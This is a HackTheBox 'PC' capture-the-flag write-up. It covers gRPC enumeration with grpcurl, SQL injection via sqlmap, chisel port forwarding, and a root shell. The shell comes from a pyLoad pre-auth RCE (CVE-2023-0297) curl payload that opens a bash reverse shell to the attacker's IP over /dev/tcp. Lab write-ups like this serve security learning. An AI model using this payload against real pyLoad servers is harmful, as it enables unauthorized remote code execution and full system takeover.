CTF-Writeups/HackTheBox/PC.md
2023-10-08 14:22:39 +05:00

4.9 KiB

HackTheBox - PC

NMAP

Nmap scan report for 10.129.19.240                     
Host is up (0.21s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.7 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:         
|   3072 91bf44edea1e3224301f532cea71e5ef (RSA)
|   256 8486a6e204abdff71d456ccf395809de (ECDSA)
|_  256 1aa89572515e8e3cf180f542fd0a281c (ED25519)
50051/tcp open  unknown          

PORT 50051

Connecting to this port through telnet or netcat, doesn't yield anything but ???

So resarching what runs on port 50051 shows that, gRPC uses this port which is an open source remote procedure call framework by google

We can analyze the traffic through wireshark by sniffing packets on our interface (tun0) and changing protocol to HTTP/2

gRPC can be enumerated through grpcurl

grpcurl -plaintext 10.129.19.240:50051 list

This listed two services, let's try listing the methods in SimpleApp

SimpleApp service has three methods which can be checked with describe arguement

We can register and login with an account which in return provides an id

grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/RegisterUser 

grpcurl -plaintext -d '{"username":"arz101" , "password":"12345"}' 10.129.19.240:50051 SimpleApp/LoginUser

Now using getInfo will ask for a token

Foothold

If we go back to login method, we do use a token if we enable verbosity with -vv

grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" 10.129.19.240:50051 SimpleApp/getInfo
This gives us an error `Unexpected : bad argument type for built-in operation` due to we haven't specified the data, if we use `describe` to see what parameters the method accepts

It needs the ID which we get after logging in

grpcurl -vv -plaintext -H "token: eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiYXJ6MTAxIiwiZXhwIjoxNjg0NjkzODY1fQ.CMWWeEN92nUfwMh8_AUGBPjHsIC7oIRTVDBZEy2qDS8" -d '{"id": "842"}' 10.129.19.240:50051 SimpleApp/getInfo

But tampering/playing around with this was a little difficult, so I tried postman and grpcui which gives you GUI with which you can work with gRPC service and also intercept the requests easily

After identifiying that it was using some filters for sqli, we can try running sqlmap which found injection on id parameter

With these credentials, we can login as sau user

Having enumerated the SUIDs, the files which are owned sau none of them yield any path to escalation, checking the local ports, there was port 8000 open which redirects to a login page

Port forwarding with chisel

chisel server -p 3333 --reverse

chisel client 10.10.16.19:3333 R:localhost:8000

Now accessing the port on our browser we'll get a login page for pyLoad which is a download manager for python

Trying the default creds like admin:admin and pyload:pyload didn't work, so searching for CVEs there was a pre-auth rce vulnerability (CVE-2023-0297)

Using the poc we'll get a shell as the root user

curl -i -s -k -X $'POST' \
    --data-binary $'jk=pyimport%20os;os.system(\"%2Fbin%2Fbash%20%2Dc%20%27bash%20%2Di%20%3E%26%20%2Fdev%2Ftcp%2F10%2E10%2E16%2E19%2F2222%200%3E%261%27\");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa' \
    $'http://localhost:8000/flash/addcrypted2'

References